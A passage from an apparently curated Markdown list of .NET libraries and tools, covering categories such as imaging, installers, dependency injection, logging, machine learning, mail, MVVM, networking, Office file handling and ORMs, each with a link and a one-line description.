* [DynamicImage](https://dynamicimage.apphb.com/) - High-performance open-source image manipulation library for ASP.NET.
* [MetadataExtractor](https://github.com/drewnoakes/metadata-extractor-dotnet) - Extracts Exif, IPTC, XMP, ICC and other metadata from image files.
* [Emgu CV](http://www.emgu.com/wiki/index.php/Main_Page) - Cross-platform .NET wrapper for the OpenCV library.
* [SimpleITK](https://simpleitk.org/) - A simplified path to Insight. Open-source multi-dimensional image analysis in Python, R, Java, C#, Lua, Ruby, TCL and C++. Developed by the Insight Toolkit community for the biomedical sciences and beyond.
* [DotImaging](https://github.com/dajuric/dot-imaging) - Minimalistic .NET imaging portable platform
* [Magick.NET](https://github.com/dlemstra/Magick.NET) - .NET wrapper for the ImageMagick library.
* [OpenCvSharp](https://github.com/shimat/opencvsharp/) - Cross platform wrapper of OpenCV for .NET Framework.
* [PixelViewer](https://github.com/carina-studio/PixelViewer) - Cross-platform (Windows/macOS/Linux) image viewer which supports reading raw Luminance/YUV/RGB/ARGB/Bayer pixels data from file and rendering it. 10/16-bit YUV and viewing image frame sequence are also supported (v1.99+).
* [TeximpNet](https://bitbucket.org/Starnick/teximpnet) - A cross-platform .NET Standard library for reading/manipulating/writing image files. The primary focus is to create 2D/3D/Cubemap textures for graphics/game applications, notably to convert images to GPU compressed formats and generate mipmaps. The library wraps the FreeImage native library to import/export over 30 common image formats, and wraps the Nvidia Texture Tools native library for GPU compression features. It also has a fully featured DDS format importer/exporter written in C#.
* [Colourful](https://github.com/tompazourek/Colourful) - Open source .NET library for working with color spaces.
* [Imgix-CSharp](https://docs.imgix.com/libraries/imgix-csharp) - Easily update image urls to be fast and responsive. **[$]**
* [ColorHelper](https://github.com/iamartyom/ColorHelper) - Useful methods for work with colors.
## Install tools
* [Wix Toolset](https://wixtoolset.org/) - The most powerful set of tools available to create your Windows installation experience
* [Squirrel](https://github.com/squirrel/squirrel.windows) - Squirrel is both a set of tools and a library, to completely manage both installation and updating your desktop Windows application.
* [Chocolatey](https://github.com/chocolatey/choco) - like `yum` or `apt-get`, but for Windows.
* [Wax](https://marketplace.visualstudio.com/items?itemName=TomEnglert.Wax) - An interactive editor for WiX projects.
* [Onova](https://github.com/Tyrrrz/Onova) - An unopinionated auto-update framework for desktop applications.
## Interactive programming
* [.NET Interactive](https://github.com/dotnet/interactive) - .NET Interactive takes the power of .NET and embeds it into your interactive experiences.
## Internationalization
* [i18n](https://github.com/turquoiseowl/i18n) - Smart internationalization for ASP.NET MVC
* [MessageFormat.NET](https://github.com/jeffijoe/MessageFormat.NET) - ICU MessageFormat implementation in .NET lets you write contextual UI messages (PCL library)
* [ResX Resource Manager](https://github.com/dotnet/ResXResourceManager) - The most popular free tool to localize all kind of applications with resx-based resources.
## Interoperability
* [CppSharp](https://github.com/mono/CppSharp) - Tools to surface C++ APIs to C#
* [Sharpen](https://github.com/mono/sharpen) - Sharpen is an Eclipse plugin created by db4o that allows you to convert your Java project into C#
* [CXXI](https://github.com/mono/cxxi) - C++ interop framework
* [pythonnet](https://github.com/pythonnet/pythonnet) - Python and .NET interop framework
* [PInvoke Interop Assistant](https://github.com/jaredpar/pinvoke-interop-assistant) - Converts C to managed P/Invoke signatures or verse visa.
* [pinvoke](https://github.com/dotnet/pinvoke) - A library containing P/Invoke code for latest Windows OS.
* [LegacyWrapper](https://github.com/CodefoundryDE/LegacyWrapper) - LegacyWrapper uses a wrapper process to call DLLs from a process of the opposing architecture (x86 or AMD64).
* [Pyrolite](https://github.com/irmen/Pyrolite) - This library allows your Java or .NET program to interface very easily with
the Python world. It uses the Pyro protocol to call methods on remote objects.
## IoC
* [Castle Windsor](https://github.com/castleproject/Windsor) - Castle Windsor is best of breed, mature Inversion of Control container available for .NET and Silverlight
* [Unity](https://github.com/unitycontainer/unity) - Lightweight extensible dependency injection container with support for constructor, property, and method call injection
* [Autofac](https://github.com/autofac/Autofac) - An addictive .NET IoC container
* [DryIoc](https://github.com/dadhi/DryIoc) - Simple, fast all fully featured IoC container.
* [Ninject](https://github.com/ninject/ninject) - The ninja of .NET dependency injectors
* [Spring.Net](https://github.com/spring-projects/spring-net) - Spring.NET is an open source application framework that makes building enterprise .NET applications easier
* [Lamar](https://jasperfx.github.io/lamar/) - A fast IoC container heavily optimized for usage within ASP.NET Core and other .NET server side applications.
* [LightInject](https://github.com/seesharper/LightInject) - A ultra lightweight IoC container
* [Simple Injector](https://github.com/simpleinjector/SimpleInjector) - Simple Injector is an easy-to-use Dependency Injection (DI) library for .NET 4+ that supports Silverlight 4+, Windows Phone 8, Windows 8 including Universal apps and Mono.
* [Microsoft.Extensions.DependencyInjection](https://github.com/dotnet/runtime/tree/main/src/libraries/Microsoft.Extensions.DependencyInjection) - The default IoC container for NET applications.
* [Scrutor](https://github.com/khellang/Scrutor) - Assembly scanning extensions for Microsoft.Extensions.DependencyInjection.
* [VS MEF](https://github.com/Microsoft/vs-mef) - Managed Extensibility Framework (MEF) implementation used by Visual Studio.
* [TinyIoC](https://github.com/grumpydev/TinyIoC) - An easy to use, hassle free, Inversion of Control Container for small projects, libraries and beginners alike.
* [Stashbox](https://github.com/z4kn4fein/stashbox) - A lightweight, portable dependency injection framework for .NET based solutions.
## JavaScript Engines
* [ClearScript](https://github.com/Microsoft/ClearScript) - A library that makes it easy to add scripting to your .NET applications. It currently supports JavaScript (via V8 and JScript) and VBScript.
* [Edge.js](https://github.com/tjanczuk/edge) - Run .NET and Node.js code in-process on Windows, macOS, and Linux
* [Jint](https://github.com/sebastienros/jint) - JavaScript interpreter for .NET which provides full ECMA 5.1 compliance and can run on any .NET platform.
* [Jurassic](https://github.com/paulbartrum/jurassic) - A implementation of the ECMAScript language and runtime. It aims to provide the best performing and most standards-compliant implementation of JavaScript for .NET.
* [YantraJS](https://github.com/yantrajs/yantra) - JavaScript Runtime (Similar to NodeJS) for .NET Standard, compiles JavaScript to IL, support for many ES6 features, generators, CommonJS modules, CSX modules and expression compiler.
## Logging
* [Essential Diagnostics](https://github.com/sgryphon/essential-diagnostics) - Extends the inbuilt features of System.Diagnostics namespace to provide flexible logging
* [NLog](https://github.com/nlog/NLog/) - NLog - Advanced .NET and Silverlight logging
* [Logazmic](https://github.com/ihtfw/Logazmic) - Open source NLog viewer for Windows
* [ELMAH](https://elmah.github.io/) - Official ELMAH site
* [Elmah MVC](https://github.com/alexbeletsky/elmah-mvc) - Elmah for MVC
* [Logary](https://github.com/logary/logary) - Logary is a high performance, multi-target logging, metric, tracing and health-check library for Mono and .NET. .NET's answer to DropWizard. Supports many targets, built for micro-services.
* [Log4Net](https://logging.apache.org/log4net/) - The Apache log4net library is a tool to help the programmer output log statements to a variety of output targets
* [Rollbar.NET](https://github.com/rollbar/Rollbar.NET) - Simplifies real-time remote error monitoring while using Rollbar.com. Open-source Rollbar Notifier SDK for any .NET-based technology stack. The SDK that can be used in any application built on the following .NET versions: .NET Core 2.0+, .NET Standard 2.0+, .NET Full Framework 4.5.1+, Mono, Xamarin, and, in general, any implementation of the .NET Standard 2.0+. It simplifies building data payloads based on exception data, tracing data, informational messages, and telemetry data and sends the payloads to the Rollbar API for remote monitoring and analysis of the hosting application's behavior.
* [Sejil](https://github.com/alaatm/Sejil) - Capture, view and filter your ASP.NET Core app's logs right from your app. It supports structured logging, querying as well as saving log queries.
* [Sentry](https://github.com/getsentry/sentry-dotnet) - .NET SDK for [Sentry](https://sentry.io/welcome/) Open-source error tracking that helps developers monitor and fix crashes in real time..
* [Serilog](https://github.com/serilog/serilog) - A no-nonsense logging library for the NoSQL era. Combines the best of traditional and structured diagnostic logging in an easy-to-use package.
* [StackExchange.Exceptional](https://github.com/NickCraver/StackExchange.Exceptional) - Error handler used for the Stack Exchange network
* [Semantic Logging Application Block (SLAB)](https://github.com/MicrosoftArchive/semantic-logging) - Extends the inbuilt features of System.Diagnostics.Tracing namespace (EventSource class) to log to several sinks including Azure Tables, Databases, files (JSON, XML, text). Supports in-process and out-of-process logging through ETW, and Rx for real-time filtering/aggregating of events.
* [ULogViewer](https://github.com/carina-studio/ULogViewer) - Cross-Platform (Windows/macOS/Linux) Universal Log Viewer which supports reading and parsing various type of logs. You can also define your own profile to parse and show logs.
* [Foundatio](https://github.com/FoundatioFx/Foundatio#logging) - A fluent logging API that can be used to log messages throughout your application.
* [Exceptionless](https://github.com/exceptionless/Exceptionless.Net) - Exceptionless .NET Client
* [Loupe](https://onloupe.com) - Centralized .NET logging and monitoring. **[Proprietary]** **[Free Tier]**
* [elmah.io](https://elmah.io) - Cloud logging for .NET web applications using ELMAH. Find bugs before you go live. Powerful search, API, integration with Slack, GitHub, Visual Studio and more. **[[Free for OSS](https://elmah.io/sponsorship/opensource)]** **[$]**
* [BugSnag](https://docs.bugsnag.com/platforms/dotnet/) - Logs errors. Includes useful diagnostic info like stack trace, session, release, etc. Has a free tier. **[Free for OSS][$]**
* [ZeroLog](https://github.com/Abc-Arbitrage/ZeroLog) - ZeroLog is a zero-allocation .NET logging library. It provides basic logging capabilities to be used in latency-sensitive applications, where garbage collections are undesirable.
## Machine Learning and Data Science
* [Infer.NET](https://dotnet.github.io/infer/) - A framework for running Bayesian inference in graphical models. It can also be used for probabilistic programming.
* [Accord.NET](http://accord-framework.net/) - Machine learning framework combined with audio and image processing libraries (computer vision, computer audition, signal processing and statistics).
* [Accord.NET Extensions](https://github.com/dajuric/accord-net-extensions) - Advanced image processing and computer vision algorithms made as fluent extensions.
* [AForge.NET](http://www.aforgenet.com/) - Framework for developers and researchers in the fields of Computer Vision and Artificial Intelligence (image processing, neural networks, genetic algorithms, machine learning, robotics).
* [Catalyst](https://github.com/curiosity-ai/catalyst) Cross-platform Natural Language Processing (NLP) library inspired by spaCy, with pre-trained models, out-of-the box support for training word and document embeddings, and flexible entity recognition models. Part of the [SciSharp Stack](https://scisharp.github.io/SciSharp/)
* [Deedle](https://bluemountaincapital.github.io/Deedle/) - Data frame and (time) series library for exploratory data manipulation with C# and F# support
* [FsLab](https://fslab.org/) - A collection of data science and machine learning libraries for F# and .NET
* [GeneticSharp](https://github.com/giacomelli/GeneticSharp) - Multi-platform genetic algorithm library for .NET Core and .NET Framework. The library has several implementations of GA operators, like: selection, crossover, mutation, reinsertion and termination.
* [numl](https://github.com/sethjuarez/numl) - Designed to include the most popular supervised and unsupervised learning algorithms while minimizing the friction involved with creating the predictive models.
* [ML.NET](https://github.com/dotnet/machinelearning) - Cross-platform open-source machine learning framework which makes machine learning accessible to .NET developers.
* [R Provider](https://bluemountaincapital.github.io/FSharpRProvider/) - Type provider that exposes R packages and functions in a type-safe way to F# callers
* [F# Data](https://github.com/fsprojects/FSharp.Data) - F# type providers for accessing XML, JSON, CSV and HTML files (based on sample documents) and for accessing WorldBank data
* [Spreads](https://github.com/Spreads/Spreads/) - Series and Panels for Real-time and Exploratory Analysis of Data Streams. Spreads library is optimized for performance and memory usage. It is several times faster than other open source projects.
* [SciSharp STACK](https://scisharp.github.io/SciSharp/) - A rich machine learning ecosystem for .NET created by porting the most popular Python libraries to C#.
* [Synapses](https://github.com/mrdimosthenis/Synapses) - An in-memory neural network library written in F#.
* [m2cgen](https://github.com/BayesWitnesses/m2cgen) - A CLI tool to transpile trained classic ML models into a native .NET (C#, F# or Visual Basic) code with zero dependencies.
## Markdown Processors
* [MarkdownSharp](https://code.google.com/archive/p/markdownsharp) - Open source C# implementation of Markdown processor, as featured on Stack Overflow.
* [F# Formatting](https://fsprojects.github.io/FSharp.Formatting/) - Tools for documenting F# and C# projects. The library contains extensible Markdown parser as a core component.
* [CommonMark.NET](https://github.com/Knagis/CommonMark.NET) - Implementation of CommonMark specification in C# for converting Markdown documents to HTML. Optimized for maximum performance and portability.
* [markdig](https://github.com/lunet-io/markdig) - A fast, powerful, CommonMark compliant, extensible Markdown processor for .NET.
## Mail
* [FluentEmail](https://github.com/lukencode/FluentEmail) - A fluent wrapper for System.Net.Mail with Razor templating support.
* [MailKit](https://github.com/jstedfast/MailKit) - A complete cross-platform mail stack including IMAP, POP3, SMTP, authentication and more. Built on top of MimeKit.
* [MailKitSimplified](https://github.com/danzuep/MailKitSimplified) - A fully-featured fluent wrapper for MailKit that makes sending _and receiving_ emails as simple as possible.
* [MimeKit](https://github.com/jstedfast/MimeKit) - A cross-platform .NET MIME creation and parser library with support for S/MIME, PGP, TNEF and Unix mbox spools.
* [PreMailer.Net](https://github.com/milkshakesoftware/PreMailer.Net) - C# library that moves your stylesheets to inline style attributes, for maximum compatibility with e-mail clients.
* [StrongGrid](https://github.com/Jericho/StrongGrid) - Client for SendGrid's v3 API. Not only allows you to send emails, but also allows you to bulk import contacts, manage lists and segments, create custom fields for your lists, etc. Also includes a parser for SendGrid Webhooks.
## Mathematics
* [MathNet](https://www.mathdotnet.com/) - Math.NET is an open source initiative to build and maintain toolkits covering fundamental mathematics, targeting advanced but also every day needs of .NET developers
* [Microsoft Automatic Graph Layout](https://github.com/Microsoft/automatic-graph-layout) - A set of tools for graph layout and viewing.
* [UnitConversion](https://github.com/atulmish/UnitConversion) - Expansible Unit Conversion Library for .NET Core and .NET Framework
* [ALGLIB](https://www.alglib.net/) - ALGLIB is a cross-platform numerical analysis and data processing library. It supports several programming languages (C++, C#, Delphi) and several operating systems (Windows and POSIX, including Linux) **[Proprietary]** and **[Free Edition]**
* [AutoDiff](https://github.com/alexshtf/autodiff) - AutoDiff is a library for quickly computing gradients of functions defined by expressions. Mainly useful in numerical optimization
* [GeometRi](https://github.com/RiSearcher/GeometRi.CSharp) - Simple and lightweight computational geometry library for .Net
* [Rationals](https://github.com/tompazourek/Rationals) - Implementation of rational number arithmetic for .NET with arbitrary precision.
* [MKL.NET](https://github.com/AnthonyLloyd/MKL.NET) - A simple cross platform .NET API for Intel MKL.
* [AngouriMath](https://github.com/asc-community/AngouriMath) - An open-source symbolic/computer algebra library, made primarily for C# and F#. It covers a range of features and might be considered as an alternative to SymPy in .NET.
* [Vim.Math3d](https://github.com/vimaec/math3d) - A feature-rich cross-platform replacement for System.Numerics with support for consistent serialization and binary layout, and additional structures and algorithms for efficient 3D Math.
* [WPF-Math](https://github.com/ForNeVeR/wpf-math) - a .NET library for rendering mathematical formulae using the LaTeX typesetting style, for the WPF framework
* [Jodo.Numerics](https://github.com/JosephJShort/Jodo/#numerics) - Provides extra number types (such as fixed-point and non-overflowing numbers) with full support for operators, math, string-parsing etc. Extensively tested, and cross-platform compatible.
## Media
* [CSCore](https://github.com/filoe/cscore) - An advanced audio library, supporting playback/recording, decoding/encoding and processing of audio data in realtime (effects, visualizations, ...).
* [TagLib#](https://github.com/mono/taglib-sharp) - TagLib# (aka taglib-sharp) is a library for reading and writing
metadata in media files, including video, audio, and photo formats
* [LibVLCSharp](https://github.com/videolan/libvlcsharp) - Xamarin bindings for libvlc, the multimedia framework powering the VLC applications made by VideoLAN.
* [NAudio](https://github.com/naudio/NAudio) - Playback, decode and encode audio in a variety of file formats such as MP3, MP4, WAV, AIFF, Speex, etc.
* [Xabe.FFmpeg](https://github.com/tomaszzmuda/Xabe.FFmpeg) - .NET Standard wrapper for FFmpeg. It allows to process media without know how FFmpeg works, and can be used to pass customized arguments to FFmpeg from C# application. **[$]**
* [SeeShark](https://github.com/vignetteapp/SeeShark) - Cross-platform camera library for .NET using FFmpeg supporting over 190 pixel formats
## Metrics
* [C# StatsD Client](https://github.com/Pereingo/statsd-csharp-client) - C# client for Etsy's StatsD
* [Foundatio](https://github.com/FoundatioFx/Foundatio#metrics) - A common interface with in-memory, Redis, StatsD, and Metrics.NET implementations.
## Micro Framework
* [.NET Micro Framework Interpreter](https://github.com/NETMF/netmf-interpreter) - Microsoft® .NET Micro Framework (NETMF) for developing embedded applications on small devices using Visual Studio
## Minification
* [Microsoft Ajax Minifier](https://archive.codeplex.com/?p=ajaxmin) - Contains JS and CSS minifiers which have a highest performance, because its have been specifically designed for .NET. Optionally produce Source Maps for JS code.
* [Web Markup Minifier](https://github.com/Taritsyn/WebMarkupMin) - .NET library that contains a set of markup minifiers. The objective of this project is to improve the performance of web applications by reducing the size of HTML, XHTML and XML code.
* [CompressedStaticFiles](https://github.com/AnderssonPeter/CompressedStaticFiles) - Send compressed static files to the browser without having to compress on demand, also has support for sending more advanced image formats when the browser indicates that i has support for it.
## Misc
* [CSharp Pad](http://csharppad.com) - A web-based C# REPL with awesome code completion.
* [AzureCrawler](https://github.com/yagopv/AzureCrawler) - Take HTML Snapshots for your Angular, Ember, Durandal or any JavaScript applications
* [CSScript](https://www.cs-script.net/) - CS-Script is a CLR based scripting system which uses C# as a programming language. CS-Script currently targets Microsoft implementation of CLR (.NET 2.0/3.0/3.5/4.0/4.5) with full support on Mono. Comes with many additional features, such as script hosting.
* [CsvHelper](https://github.com/JoshClose/CsvHelper) - Library to help reading and writing CSV files https://github.com/JoshClose/CsvHelper
* [RecordParser](https://github.com/leandromoh/recordparser) - Library to help reading and writing CSV and Flat files with zero heap allocation.
* [Hashids.net](https://github.com/ullmark/hashids.net) - Generate short unique ids from integers, as per https://hashids.org
* [ConsoleTableExt](https://github.com/minhhungit/ConsoleTableExt) - Fluent library to create table for .Net console application.
* [FlatMapper](https://github.com/joaomatossilva/FlatMapper) - A library to import and export data from and to plain text files in a LINQ-compatible way.
* [FluentValidation](https://github.com/FluentValidation/FluentValidation) - A small validation library for .NET that uses a fluent interface and lambda expressions for building validation rules.
* [FormHelper](https://github.com/SinanBozkus/FormHelper) - Form & Validation Helper for ASP.NET Core. Form Helper helps you to create ajax forms and validations without writing any javascript code. (Compatible with Fluent Validation)
* [Guard](https://github.com/safakgur/guard) - A high-performance, extensible argument validation library.
* [Valit](https://github.com/valit-stack/Valit) - Valit is dead simple, fluent validation for .NET Core.
* [Validot](https://github.com/bartoszlenar/Validot) - Validot is a performance-first, compact library for advanced model validation. Using a simple declarative fluent interface, it efficiently handles classes, structs, nested members, collections, nullables, plus any relation or combination of them. It also supports translations, custom logic extensions with tests, and DI containers.
* [Humanizer](https://github.com/Humanizr/Humanizer) - Humanizer meets all your .NET needs for manipulating and displaying strings, enums, dates, times, timespans, numbers and quantities
* [LINQPad](https://www.linqpad.net) - a C#/VB/F# scratchpad that instantly executes any expression, statement block or program with rich output formatting and a wealth of features. Also lets you interactively query databases in LINQ. [$]
* [LINQPad.QueryPlanVisualizer](https://github.com/Giorgi/LINQPad.QueryPlanVisualizer/) - View SQL Server and Postgres query plans directly inside LINQPad.
* [Polly](https://github.com/App-vNext/Polly) - Express transient-exception-handling and resilience policies such as Retry, Wait-and-Retry, Circuit Breaker, and Bulkhead Isolation in a fluent manner. Fully thread-safe and full async support. (4.0 / 4.5 / .NET Core / .NET Standard / Xamarin).
* [Rant](https://github.com/TheBerkin/rant3) - The Rant Procedural Text Generation DSL
* [ScriptCS](https://github.com/scriptcs/scriptcs) - Write C# apps with a text editor, NuGet and the power of Roslyn!
* [Shielded](https://github.com/jbakic/Shielded) - Software Transactional Memory (STM) implementation for .NET
* [MSBuild ILMerge task](https://archive.codeplex.com/?p=ilmergemsbuild) - MSBuild ILMerge task is a NuGet package allows you to use the famous ILMerge utility in automated builds and/or Visual Studio projects.
* [ReactJS.NET](https://github.com/reactjs/React.NET) - ReactJS.NET is a library that makes it easier to use Babel along with Facebook's React and JSX from C#.
* [Aeron.NET](https://github.com/AdaptiveConsulting/Aeron.NET) - Efficient reliable UDP unicast, UDP multicast, and IPC message transport - .NET port of Aeron
* [TypeShape](https://github.com/eiriktsarpalis/TypeShape) - TypeShape is a small, extensible F# library for practical generic programming
* [Streams](https://github.com/nessos/Streams) - A lightweight F#/C# library for efficient functional-style pipelines on streams of data.
* [Warden](https://github.com/warden-stack/Warden) - Define "health checks" for your applications, resources and infrastructure. Keep your Warden on the watch
* [ByteSize](https://github.com/omar/ByteSize) - ByteSize is a utility class that makes byte size representation in code easier by removing ambiguity of the value being represented. ByteSize is to bytes what System.TimeSpan is to time.
* [Jot](https://github.com/anakic/jot) - a library for persisting and restoring application state (a better alternative to .settings files).
* [Enums.NET](https://github.com/TylerBrinkley/Enums.NET) - Enums.NET is a high-performance type-safe .NET enum utility library
* [HidLibrary](https://github.com/mikeobrien/HidLibrary) - This library enables you to enumerate and communicate with Hid compatible USB devices in .NET.
* [SystemWrapper](https://github.com/jozefizso/SystemWrapper) - SystemWrapper is .NET library for easier testing of system APIs.
* [YoutubeExplode](https://github.com/Tyrrrz/YoutubeExplode) - Ultimate library for extracting metadata and downloading Youtube videos and playlists.
* [DeviceId](https://github.com/MatthewKing/DeviceId) - Generate a 'device ID' that can be used to uniquely identify a computer.
* [DeviceDetector.NET](https://github.com/totpero/DeviceDetector.NET) - The Universal Device Detection library will parse any User Agent and detect the browser, operating system, device used (desktop, tablet, mobile, tv, cars, console, etc.), brand and model.
* [NaturalSort.Extension](https://github.com/tompazourek/NaturalSort.Extension) - Extension method for StringComparer that adds support for natural sorting (e.g. "abc1", "abc2", "abc10" instead of "abc1", "abc10", "abc2").
* [Coravel](https://github.com/jamesmh/coravel) Near-zero config .NET Core library that makes Task Scheduling, Caching, Queuing, Mailing, Event Broadcasting (and more) a breeze!
* [Quickenshtein](https://github.com/Turnerj/Quickenshtein) - An extremely quick and memory efficient Levenshtein Distance calculator with SIMD and Threading support
* [Infinity Crawler](https://github.com/TurnerSoftware/InfinityCrawler) - A simple but powerful web crawler library for .NET
* [Build Versioning](https://github.com/TurnerSoftware/BuildVersioning) - Simple build versioning for .NET, powered by Git tags
* [SystemTextJson.JsonDiffPatch](https://github.com/weichch/system-text-json-jsondiffpatch) - High-performance, low-allocating JSON object diff and patch extension for System.Text.Json. Support generating patch document in RFC 6902 JSON Patch format.
## MVVM
* [Community Toolkit](https://github.com/CommunityToolkit) - Collection of control & helper libraries and samples for various .NET technologies. Contains modern MVVM library, supported by Microsoft. Includes [Windows Community Toolkit](https://github.com/CommunityToolkit/WindowsCommunityToolkit), [MAUI Community Toolkit](https://github.com/CommunityToolkit/Maui), and [Dotnet Community Toolkit](https://github.com/CommunityToolkit/dotnet).
* [Caliburn.Micro](https://github.com/Caliburn-Micro/Caliburn.Micro) - A small, yet powerful framework, designed for building applications across all XAML platforms. Its strong support for MV* patterns will enable you to build your solution quickly, without the need to sacrifice code quality or testability.
* [MVVM Light Toolkit](https://github.com/lbugnion/mvvmlight) - The main purpose of the toolkit is to accelerate the creation and development of MVVM applications in WPF, Silverlight, Windows Store (RT) and for Windows Phone
* [Catel](https://www.catelproject.com/) - Catel is an application development platform with the focus on MVVM (WPF, Silverlight, Windows Phone and WinRT) and MVC (ASP.NET MVC). The core of Catel contains an IoC container, models, validation, memento, message mediator, argument checking, etc.
* [UpdateControls](https://updatecontrols.net/cs/) - Update Controls does not require that you implement `INotifyPropertyChanged` or declare a `DependencyProperty`. It connects controls directly to CLR properties. This makes it perfect for the Model/View/ViewModel pattern.
* [ReactiveUI](https://github.com/reactiveui/reactiveui/) - An MVVM framework for .NET that integrates the Reactive Extensions (Rx) framework, enabling developers to build elegant, testable applications using WPF, Windows Store Apps, WP8 or Xamarin.
* [Okra App Framework](https://okraframework.github.io) - An app centric MVVM framework for Windows 8.1 built with dependency injection in mind, including a full set of Visual Studio MVVM templates.
* [Prism](https://github.com/PrismLibrary/Prism) - A cross-platform desktop and mobile MVVM development framework.
* [Win Application Framework (WAF)](https://github.com/jbe2277/waf) - A lightweight Framework that helps you to create well structured WPF and UWP Applications. It supports you in applying a Layered Architecture and the Model-View-ViewModel pattern.
* [MVVMCross](https://github.com/MvvmCross/MvvmCross) - Cross-platform mvvm mobile development framework for WPF, Silverlight for WP7 and WP8, Mono for Android, MonoTouch for iOS, Windows Universal projects (WPA8.1 and Windows 8.1 Store apps). Makes extensive use of Portable Class Libraries (PCL) to provide maintainable cross platform C# native applications.
* [Stylet](https://github.com/canton7/stylet/) - Minimal MVVM framework inspired by Caliburn Micro, with good documentation, high test coverage, and its own IoC container
* [Gemini](https://github.com/tgjones/gemini) - IDE framework similar in concept to the Visual Studio Shell. Built on WPF, AvalonDock, and Caliburn Micro.
* [Toms Toolbox](https://github.com/tom-englert/TomsToolbox) - Visual Composition framework to easily build modularized MVVM applications based on the [Managed Extensibility Framework (MEF)](https://docs.microsoft.com/en-us/dotnet/framework/mef/).
* [MVVM Dialogs](https://github.com/FantasticFiasco/mvvm-dialogs) - Framework simplifying the concept of opening dialogs from a view model when using MVVM in WPF or UWP.
* [Smaragd](https://github.com/nkristek/Smaragd) - A platform-independent, lightweight library for developing .NET applications using the MVVM architecture.
* [EBind](https://github.com/SIDOVSKY/EBind) - A concise, fast and feature-rich .NET data binding solution.
## Networking
* [NetCoreServer](https://github.com/chronoxor/NetCoreServer) - Ultra fast and low latency asynchronous socket server & client C# .NET Core library with support TCP, SSL, UDP, HTTP, HTTPS, WebSocket protocols and 10K connections problem solution (NETStandard).
* [SharpPcap](https://github.com/chmorgan/sharppcap) - Fully managed, cross platform (Windows, Mac, Linux) .NET library for capturing packets from live and file based devices.
## Object to object mapping
* [AutoMapper](https://github.com/AutoMapper/AutoMapper) - A convention-based object-object mapper in .NET. https://automapper.org
* [TinyMapper](https://github.com/TinyMapper/TinyMapper) - A tiny and quick object mapper for .NET.
* [ExpressMapper](https://github.com/fluentsprings/ExpressMapper) - A lightweight, lighting fast .NET mapper to map one type of object(s) to another in automated and easy way. ExpressMapper relies completely on the expression trees.
* [AgileMapper](https://github.com/agileobjects/AgileMapper) - A zero-configuration Object-Object mapper supporting .NET Standard 1.0
* [Mapperly](https://github.com/riok/mapperly) - A .NET source generator for generating object mappings. No runtime reflection.
* [Mapster](https://github.com/MapsterMapper/Mapster) - A high performance object mapper in .net
## Office
* [ExcelDna](https://github.com/Excel-DNA/ExcelDna) - ExcelDna makes it easier to create and deploy Excel Add-Ins using C#, F# or VB .NET
* [ClosedXML](https://github.com/ClosedXML/ClosedXML) - ClosedXML makes it easier for developers to create Excel 2007/2010 files
* [NPOI](https://github.com/tonyqus/npoi) - This project is the .NET version of POI Java project at https://poi.apache.org/.
* [EPPlus](https://github.com/JanKallman/EPPlus) - EPPlus is a .NET library that reads and writes Excel 2007/2010 files using the Open Office XML format (xlsx).
* [Open XML SDK](https://github.com/officedev/open-xml-sdk) - The Open XML SDK provides open-source libraries for working with Open XML Documents (DOCX, XLSX, and PPTX).
* [DocX](https://github.com/xceedsoftware/DocX) - DocX is a .NET library that allows developers to manipulate Word 2007/2010/2013 files, it does not require Microsoft Word or Office to be installed.
* [ExcelDataReader](https://github.com/ExcelDataReader/ExcelDataReader) - Lightweight and fast library written in C# for reading Microsoft Excel files (2.0-2007).
* [NetOffice](https://github.com/NetOfficeFw/NetOffice) - .NET wrapper assemblies for Microsoft Office applications.
* [GemBox.Bundle](https://www.gemboxsoftware.com/bundle) - A package of .NET components that enable fast, simple and efficient processing of office files (Excel, Word, PowerPoint, PDF and emails). **[$]****[Free Lite versions]**
* [Outlook Redemption](http://www.dimastr.com/redemption/home.htm) - Library to work with the Outlook Object Model and (Extended) MAPI. Supports Outlook 98 - 2019. Work with objects/mails/accounts/folders in Exchange and Outlook. **[$]**
* [ShapeCrawler](https://github.com/ShapeCrawler/ShapeCrawler) - A fluent API for the processing of PowerPoint presentations without Microsoft Office installed.
* [MiniExcel](https://github.com/shps951023/MiniExcel) - A micro Excel helper avoids OOM and high performance to create/mapping/template-fill-data.
* [Toxy](https://github.com/nissl-lab/toxy) - .NET text extraction framework supports a few file formats
## OpenAI
* [Cledev.OpenAI](https://github.com/lucabriguglia/Cledev.OpenAI) - .NET SDK for OpenAI which includes ChatGPT, DALL-E and Whisper APIs and a Blazor Server playground.
## ORM
* [Entity Framework 6](https://github.com/dotnet/ef6) - Object-relational mapper that enables .NET developers to work with relational data using domain-specific objects
* [Entity Framework Core](https://github.com/dotnet/efcore) - Object-relational mapper that enables .NET developers to work with relational data using domain-specific objects
* [EntityFramework.Exceptions](https://github.com/Giorgi/EntityFramework.Exceptions) - Use typed Exceptions for Entity Framework Core when your SQL query violates database constraints in SqlServer, MySql, PostgreSQL or SQLite
* [EFCore.BulkExtensions](https://github.com/borisdj/EFCore.BulkExtensions) - Entity Framework Core Bulk Extensions for super fast (BulkCopy) CRUD ops + SaveChanges on multiple DBs: SQL, PG, My, Lite.
* [Dapper](https://github.com/StackExchange/Dapper) - A simple object mapper for .NET by [StackExchange](https://stackexchange.github.io/)
* [Dapper Extensions](https://github.com/tmsmith/Dapper-Extensions) - Small library that complements Dapper by adding basic CRUD operations (Get, Insert, Update, Delete) for your POCOs
* [Dapper.FastCRUD](https://github.com/MoonStorm/Dapper.FastCRUD) - The fastest micro-ORM extension for Dapper
* [SqlSugar](https://github.com/donet5/SqlSugar) - Another ORM library supports many RDBMS including MySql, SqlServer, Sqlite, Oracle, Postgresql
* [FreeSql](https:/github.com/dotnetcore/FreeSql) - a convenient ORM in dotnet, supports MySql, SqlServer, PostgreSQL, Oracle, Sqlite, Firebird, 达梦, 人大金仓, 神舟通用, 翰高 and Access.
* [NHibernate](https://github.com/nhibernate) - NHibernate Object Relational Mapper
* [Fluent NHibernate](https://github.com/nhibernate/fluent-nhibernate) - Fluent, XML-less, compile safe, automated, convention-based mappings for NHibernate.
* [FluentMigrator](https://github.com/fluentmigrator/fluentmigrator) - Fluent Migrations framework for .net
* [ServiceStack.OrmLite](https://github.com/ServiceStack/ServiceStack.OrmLite) - Light, simple and fast convention-based POCO ORM **[[Free for OSS](https://github.com/ServiceStack/ServiceStack.OrmLite/blob/master/license.txt)]** **[$]**
* [Massive](https://github.com/FransBouma/Massive) - A small, happy, data access tool that will love you forever.
* [LINQ to DB](https://github.com/linq2db/linq2db) - The fastest LINQ database access library offering a simple, light, fast, and type-safe layer between your POCO objects and your database.
